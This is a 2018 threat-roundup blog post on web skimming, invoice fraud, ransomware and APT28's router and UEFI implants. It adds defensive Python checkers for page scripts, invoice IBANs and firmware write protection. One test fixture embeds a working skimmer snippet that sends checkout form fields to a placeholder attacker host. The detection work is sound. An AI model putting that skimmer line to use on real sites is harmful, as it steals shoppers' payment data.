Top threats September 2018: veteran criminals like “artisanal” hacking
In September we shook off the beach sand and returned to our professional lives. The criminals, in that sense, aren't very different from us. Over the summer our Cyber Defense Centers saw the usual rookie attacks (like PyLocky, ransomware written in Python and shipped with the interpreter bundled in), but we also saw veterans taking an "artisanal" approach. This trend, rookie criminals doing old tricks while veterans go bespoke, defines this month's top threats blog.
Website skimming & Magecart
Website skimming is the art of appending a few lines of code, typically JavaScript, to the pages served by a compromised web server. That code then "scrapes" the data entered into payment forms, such as credit card details, and sends it to the attackers. Ticketmaster and British Airways were hit in the UK, as reported by RiskIQ. The attack is very interesting, especially if you're in retail or sell through on-line channels, but it does have a prerequisite: the server needs to be hacked first. And how do they do that?
The truth is, it can be done in many ways: CMS credential theft, social engineering, vulnerabilities and exploit kits. It's a numbers game. The criminals go after the infection first and ask questions later. When you infect 100,000 machines, there are bound to be several dozen interesting ones inside enterprises. Website skimming is one more trick in that arsenal.
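Because a skimmer is, by definition, a change to the checkout page, the check that catches it is a baseline comparison of the scripts that page serves. The following is an added example written for this post, not code from the original article or from RiskIQ; the checkout HTML, the placeholder integrity value and the `stats-collector.invalid` hostname are all constructed. It captures the external script sources and the hashes of inline scripts from a clean copy of the page, then reports anything that later appears on the page and is not in that baseline.

```python
"""Baseline check for the scripts served on a checkout page.

Added example, not code from the original post or from RiskIQ. The page
HTML and hostnames below are constructed; in practice you fetch the live
checkout page from outside, on a schedule, and compare it with a baseline
captured at deploy time, because a skimmer is a change to the page.
"""
import base64
import hashlib
from html.parser import HTMLParser


def sri_hash(data: bytes) -> str:
    """Subresource Integrity value (sha384, base64) for a script body."""
    return "sha384-" + base64.b64encode(hashlib.sha384(data).digest()).decode()


class ScriptCollector(HTMLParser):
    """Collects external script sources and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external = []  # (src, integrity attribute or None)
        self.inline = []    # inline script bodies
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        a = dict(attrs)
        if a.get("src"):
            self.external.append((a["src"], a.get("integrity")))
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf).strip())


def build_baseline(html: str) -> dict:
    """Capture the baseline from a page known to be clean (e.g. at deploy time)."""
    p = ScriptCollector()
    p.feed(html)
    return {
        "external": dict(p.external),
        "inline": {sri_hash(body.encode()) for body in p.inline},
    }


def audit_scripts(html: str, baseline: dict) -> list:
    """Return findings for scripts that differ from the baseline (empty = unchanged)."""
    p = ScriptCollector()
    p.feed(html)
    findings = []
    for src, integrity in p.external:
        expected = baseline["external"].get(src)
        if expected is None:
            findings.append(f"unknown external script: {src}")
        elif integrity != expected:
            findings.append(f"integrity attribute missing or changed on {src}")
    for body in p.inline:
        if sri_hash(body.encode()) not in baseline["inline"]:
            findings.append(f"unknown inline script: {body[:60]!r}")
    return findings


# Constructed checkout page; the integrity value is a placeholder, not a real hash.
CLEAN_PAGE = """<html><body>
<form id="pay" action="/checkout">
  <input name="cardnumber"><input name="cvc"><button>Pay</button>
</form>
<script src="/static/checkout.js" integrity="sha384-placeholder"></script>
<script>window.checkoutStep = "payment";</script>
</body></html>"""

# The same page after the kind of change the post describes: one injected
# inline hook that ships the form fields on submit, plus a script pulled from
# a host the shop never used (made-up hostname).
SKIMMED_PAGE = CLEAN_PAGE.replace(
    "</body>",
    '<script src="https://cdn.stats-collector.invalid/s.js"></script>\n'
    "<script>document.getElementById('pay').addEventListener('submit', function () {"
    " navigator.sendBeacon('https://cdn.stats-collector.invalid/c', new FormData(this)); });"
    "</script>\n</body>",
)

BASELINE = build_baseline(CLEAN_PAGE)

if __name__ == "__main__":
    for finding in audit_scripts(SKIMMED_PAGE, BASELINE) or ["no changes"]:
        print(finding)
```

Two points on the design: the baseline must come from a copy you trust (the build artefact, not a crawl of the possibly already compromised site), and the check only tells you the page changed, so pair it with a Content-Security-Policy `script-src` allowlist on the checkout page so that an injected script from an unknown host does not execute even before anyone reads the report.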
“Artisanal” hacking and extortion
Over the summer we increasingly saw veteran criminals search for value in these compromised networks. They do more than Magecart, too. In our Cyber Defense Centers we've observed what amounts to "digitally steaming open envelopes": from the initial infection, moving laterally to the CRM (Customer Relationship Management) system and finding the invoice template. Then they change one small field, the bank account, substituting their money mule's account. Your customers then pay the invoice to a criminal account instead of yours.
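The defensive counterpart to that one-field edit is equally small: know which payment accounts are yours and check every template or generated invoice against that list, plus a content hash so any other edit to the template is noticed. The following is an added example, not code from the original post; the template text is constructed and the two IBANs are the published example IBANs (GB82 WEST ... and DE89 3704 ...), not real accounts. The IBAN checksum is the standard ISO 7064 mod-97 computation.

```python
"""Check an invoice template for a payment account that is not ours.

Added example, not from the original post. The template text is constructed
and the IBANs are published example IBANs, not real accounts. The same check
applies to any document or CRM field that carries payment details: invoices,
quotes, reminder e-mails, signatures.
"""
import hashlib
import re

# Two-letter country, two check digits, then 11-30 alphanumerics with optional
# single spaces (the way templates usually print an IBAN). Deliberately loose;
# the mod-97 check below filters out product codes that happen to match.
IBAN_RE = re.compile(r"\b[A-Z]{2}\d{2}(?: ?[A-Z0-9]){11,30}\b")


def iban_valid(iban: str) -> bool:
    """ISO 7064 mod-97 check: move the first four characters to the end,
    map letters to 10..35, and the resulting number must be 1 mod 97."""
    s = iban.replace(" ", "").upper()
    if not re.fullmatch(r"[A-Z]{2}\d{2}[A-Z0-9]{11,30}", s):
        return False
    rearranged = s[4:] + s[:4]
    return int("".join(str(int(c, 36)) for c in rearranged)) % 97 == 1


def find_ibans(text: str) -> list:
    """All checksum-valid IBANs in the text, spaces removed."""
    found = []
    for raw in IBAN_RE.findall(text):
        iban = raw.replace(" ", "")
        if iban_valid(iban):
            found.append(iban)
    return found


def audit_invoice_template(template: str, our_ibans: set, baseline_sha256: str = None) -> list:
    """Findings for a template whose content or payment account has changed."""
    findings = []
    digest = hashlib.sha256(template.encode()).hexdigest()
    if baseline_sha256 and digest != baseline_sha256:
        findings.append("template content changed since baseline")
    for iban in find_ibans(template):
        if iban not in our_ibans:
            findings.append(f"payment account {iban} is not one of ours")
    return findings


OUR_IBANS = {"GB82WEST12345698765432"}

# Constructed template with placeholder fields the CRM would fill in.
CLEAN_TEMPLATE = """INVOICE {{invoice_no}}
Bill to: {{customer}}
Amount due: {{total}}
Please pay by bank transfer to:
  Account holder: Example Ltd
  IBAN: GB82 WEST 1234 5698 7654 32
  BIC: {{bic}}
"""

# The single-field change the post describes: only the account is swapped.
TAMPERED_TEMPLATE = CLEAN_TEMPLATE.replace(
    "GB82 WEST 1234 5698 7654 32", "DE89 3704 0044 0532 0130 00")

BASELINE_SHA256 = hashlib.sha256(CLEAN_TEMPLATE.encode()).hexdigest()

if __name__ == "__main__":
    for f in audit_invoice_template(TAMPERED_TEMPLATE, OUR_IBANS, BASELINE_SHA256) or ["ok"]:
        print(f)
```

Run it against the rendered invoices as they leave the system, not only against the stored template: an attacker with CRM access can just as easily edit the account on individual outgoing documents, and the allowlist check is what catches both.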
We also saw criminals going after on-line backups and destroying them before deploying generic ransomware. With recovery denied in this way, there's not a lot a victim can do, which is why any backup worth the name needs at least one copy that credentials stolen from the production network cannot delete: offline, or on storage that enforces immutability. Veteran criminals understand this and ask for an enterprise ransom. One report mentions that criminals are getting very good at asking for a "Goldilocks" ransom: not too much, not too little, but just right. Apparently some of the more successful criminals of a few years ago have now turned to this MO.
APT28 still at it
APT28 (or Fancy Bear, Sednit, or whatever; we're talking about a Russia-linked APT group) has been very busy churning out VPNFilter modules. Go ahead and reboot those home routers: a reboot clears the non-persistent stages, and a firmware update or factory reset is needed to get rid of the persistent first stage. Even if they're not likely to target you, you don't want an APT in your home.
LoJax is a UEFI rootkit, found in the wild, that has been attributed to APT28. Its relevance is that achieving persistence before the operating system starts is something of a holy grail in espionage. There are several ways of doing this, but this one is potentially powerful: threat detection inside the operating system will likely not see it, and because the implant lives in the SPI flash on the motherboard it survives reinstalling the OS or replacing the disk. The questions to ask of your own fleet are whether the firmware's write protection is actually enabled and whether Secure Boot is on.
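Whether an implant can be written to the flash at all comes down to a handful of register bits, so the check is worth seeing in code. The following is an added example, not from the original post or from ESET's LoJax analysis: it decodes the Intel PCH BIOS_CNTL register and the SPI protected ranges the way a firmware write-protection audit does. The bit positions follow Intel's PCH documentation (BIOS_CNTL at offset 0xDC of the LPC bridge); the register values and ranges in the block are constructed, and obtaining live values is assumed to be done with a tool such as chipsec, whose `common.bios_wp` module performs this check.

```python
"""Decode Intel PCH BIOS_CNTL and the SPI protected ranges to answer the one
question a UEFI implant cares about: can ring 0 write the firmware flash?

Added example, not from the original post or from ESET's LoJax analysis.
Bit positions follow Intel's PCH documentation for BIOS_CNTL (LPC bridge,
offset 0xDC):
  bit 0 BIOSWE   BIOS Write Enable
  bit 1 BLE      BIOS Lock Enable: setting BIOSWE raises an SMI that clears it
  bit 5 SMM_BWP  SMM BIOS Write Protect: flash writable only from SMM
Reading the live register needs a tool such as chipsec (its common.bios_wp
module does this check); the values below are constructed.
"""
BIOSWE = 1 << 0
BLE = 1 << 1
SMM_BWP = 1 << 5


def classify_bios_cntl(value: int) -> str:
    """'protected', 'lock-only' or 'writable' for a BIOS_CNTL value."""
    if value & SMM_BWP:
        return "protected"   # non-SMM writes blocked whatever BIOSWE says
    if value & BIOSWE:
        return "writable"    # any kernel driver can write the flash
    if value & BLE:
        # BLE alone relies on the SMI handler clearing BIOSWE before a second
        # CPU can issue the write; that race is known to be winnable, so treat
        # this as weaker than SMM_BWP.
        return "lock-only"
    return "writable"


def ranges_cover(region: tuple, protected_ranges: list) -> bool:
    """True if write-protected SPI ranges (base, limit, write_protect) fully
    cover the flash region (start, end). Ranges are given already decoded
    from the PR0..PR4 registers, as inclusive byte addresses."""
    start, end = region
    pos = start
    for base, limit, wp in sorted(r for r in protected_ranges if r[2]):
        if base > pos:
            break            # a gap before this range: not covered
        pos = max(pos, limit + 1)
        if pos > end:
            return True
    return pos > end


def flash_write_protected(bios_cntl: int, bios_region: tuple, protected_ranges: list) -> bool:
    """Either BIOS_CNTL or the protected ranges must shut the door."""
    return classify_bios_cntl(bios_cntl) == "protected" or ranges_cover(bios_region, protected_ranges)


if __name__ == "__main__":
    # Constructed readings; a real check obtains them from the hardware.
    bios_region = (0x500000, 0x7FFFFF)
    prs = [(0x500000, 0x5FFFFF, True), (0x600000, 0x7FFFFF, True)]
    for value in (0x00, 0x02, 0x2A):
        print(f"BIOS_CNTL=0x{value:02X}: {classify_bios_cntl(value)}, "
              f"with PRs: {flash_write_protected(value, bios_region, prs)}")
```

A machine that reports "writable" or "lock-only" with no covering protected ranges is one where a kernel-level attacker can reflash the firmware, which is exactly the precondition a UEFI implant needs; fixing that is a firmware update or vendor setting, not something the OS can do for you.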
Ransomware is alive and kicking
As veteran criminals move to bespoke ransomware, rookie criminals seem to be backing away from CryptoJacking and going back to ransomware. In September a new version of GandCrab was released in criminal circles, and victims across Europe noticed soon after. GandCrab is not particularly interesting; it's not more or less dangerous than other ransomware. What is interesting is the unexpected increase in ransomware over the summer, and the fact that rookie criminals still turn to this destructive attack form. We had hoped they'd stick to CryptoJacking, which doesn't destroy anything and only costs a bunch of CPU cycles.
We'll release a quick update on the statistics for ransomware versus CryptoJacking later this month.